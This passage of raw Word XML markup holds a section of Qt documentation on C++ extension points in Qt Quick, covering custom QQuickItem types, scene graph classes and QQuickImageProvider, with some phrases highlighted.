      <w:bookmarkStart w:id="2571" w:name="_Toc483605646"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C++ Extension Points Provided By Qt Quick</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2568"/>
      <w:bookmarkEnd w:id="2569"/>
      <w:bookmarkEnd w:id="2570"/>
      <w:bookmarkEnd w:id="2571"/>
    </w:p>
    <w:p w:rsidR="00DA720E" w:rsidRPr="00DA720E" w:rsidRDefault="00DA720E" w:rsidP="00DA720E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">All QML applications can be extended from C++ in order </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to use additional functionality implemented in C++ code</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to provide a C++ based QML plugin</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This topic of extending QML from C++ is covered in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2798" w:history="1">
        <w:r w:rsidRPr="00DA720E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Integrating QML and C++</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA720E" w:rsidRPr="00DA720E" w:rsidRDefault="00DA720E" w:rsidP="00DA720E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Additionally</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick module provides several extension and integration points for C++ developers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, specific to this module. In particular, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows C++ developers to create and register custom</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2799" w:history="1">
        <w:r w:rsidRPr="00FB76FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-derived types</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be rendered by Qt Quick</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It also </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides several scene graph-related classes which allow developers to define their own rendering primitives</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA720E" w:rsidRPr="00DA720E" w:rsidRDefault="00DA720E" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2572" w:name="user-defined-qquickitem-derived-types"/>
      <w:bookmarkStart w:id="2573" w:name="_Toc483001092"/>
      <w:bookmarkStart w:id="2574" w:name="_Toc483004061"/>
      <w:bookmarkStart w:id="2575" w:name="_Toc483604427"/>
      <w:bookmarkStart w:id="2576" w:name="_Toc483605647"/>
      <w:bookmarkEnd w:id="2572"/>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User-Defined QQuickItem-Derived Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2573"/>
      <w:bookmarkEnd w:id="2574"/>
      <w:bookmarkEnd w:id="2575"/>
      <w:bookmarkEnd w:id="2576"/>
    </w:p>
    <w:p w:rsidR="00DA720E" w:rsidRPr="00DA720E" w:rsidRDefault="00DA720E" w:rsidP="00DA720E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">While the Qt Quick module already provides a rich library of visual item types for use in a QML application, some developers may wish to define their own item-derived types in C++ and expose them to the QML type system. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>easiest way to do this is to subclass</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2800" w:history="1">
        <w:r w:rsidRPr="00FB76FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which is the base type for all visual types in the Qt Quick module</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2801" w:history="1">
        <w:r w:rsidRPr="00DA720E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation for more details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA720E" w:rsidRPr="00DA720E" w:rsidRDefault="00DA720E" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2577" w:name="scene-graph-related-classes"/>
      <w:bookmarkStart w:id="2578" w:name="_Toc483001093"/>
      <w:bookmarkStart w:id="2579" w:name="_Toc483004062"/>
      <w:bookmarkStart w:id="2580" w:name="_Toc483604428"/>
      <w:bookmarkStart w:id="2581" w:name="_Toc483605648"/>
      <w:bookmarkEnd w:id="2577"/>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scene Graph-Related Classes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2578"/>
      <w:bookmarkEnd w:id="2579"/>
      <w:bookmarkEnd w:id="2580"/>
      <w:bookmarkEnd w:id="2581"/>
    </w:p>
    <w:p w:rsidR="00DA720E" w:rsidRPr="00DA720E" w:rsidRDefault="00DA720E" w:rsidP="00DA720E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick 2 makes use of a dedicated scene graph based on OpenGL ES 2.0 or OpenGL 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for its rendering. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using a scene graph for graphics rather than the traditional imperative painting systems (</w:t>
      </w:r>
      <w:hyperlink r:id="rId2802" w:history="1">
        <w:r w:rsidRPr="00FB76FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QPainter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and similar), means the scene to be rendered can be retained between frames and the complete set of primitives to render is known before rendering starts</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>opens up for a number of optimizations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>such as batching the OpenGL draw calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to minimize state changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>discarding obscured primitives</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA720E" w:rsidRPr="00DA720E" w:rsidRDefault="00DA720E" w:rsidP="00DA720E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2803" w:history="1">
        <w:r w:rsidRPr="00DA720E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick C++ API</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">provides various classes to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enable custom nodes to be created in C++.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA720E" w:rsidRPr="00DA720E" w:rsidRDefault="00DA720E" w:rsidP="00DA720E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2804" w:history="1">
        <w:r w:rsidRPr="00DA720E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Scene Graph</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation for details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA720E" w:rsidRPr="00DA720E" w:rsidRDefault="00DA720E" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2582" w:name="pixmap-and-threaded-image-support"/>
      <w:bookmarkStart w:id="2583" w:name="_Toc483001094"/>
      <w:bookmarkStart w:id="2584" w:name="_Toc483004063"/>
      <w:bookmarkStart w:id="2585" w:name="_Toc483604429"/>
      <w:bookmarkStart w:id="2586" w:name="_Toc483605649"/>
      <w:bookmarkEnd w:id="2582"/>
      <w:r w:rsidRPr="001945D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pixmap and Threaded Image Support</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2583"/>
      <w:bookmarkEnd w:id="2584"/>
      <w:bookmarkEnd w:id="2585"/>
      <w:bookmarkEnd w:id="2586"/>
    </w:p>
    <w:p w:rsidR="00DA720E" w:rsidRPr="00DA720E" w:rsidRDefault="00DA720E" w:rsidP="00DA720E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">While the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML engine allows QML application to load images from filesystem or network resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>some applications may require the additional option of loading images from C++ based processes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be implemented through the</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2805" w:history="1">
        <w:r w:rsidRPr="00FB76FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickImageProvider</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides support for pixmap loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>threaded image requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for QML applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any QML application that requests an image through the special "image:" URL scheme will be directed to an appropriate image provider to load the image</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA720E" w:rsidRPr="00DA720E" w:rsidRDefault="00DA720E" w:rsidP="00DA720E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For more information, see the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2806" w:history="1">
        <w:r w:rsidRPr="00DA720E">
          <w:rPr>
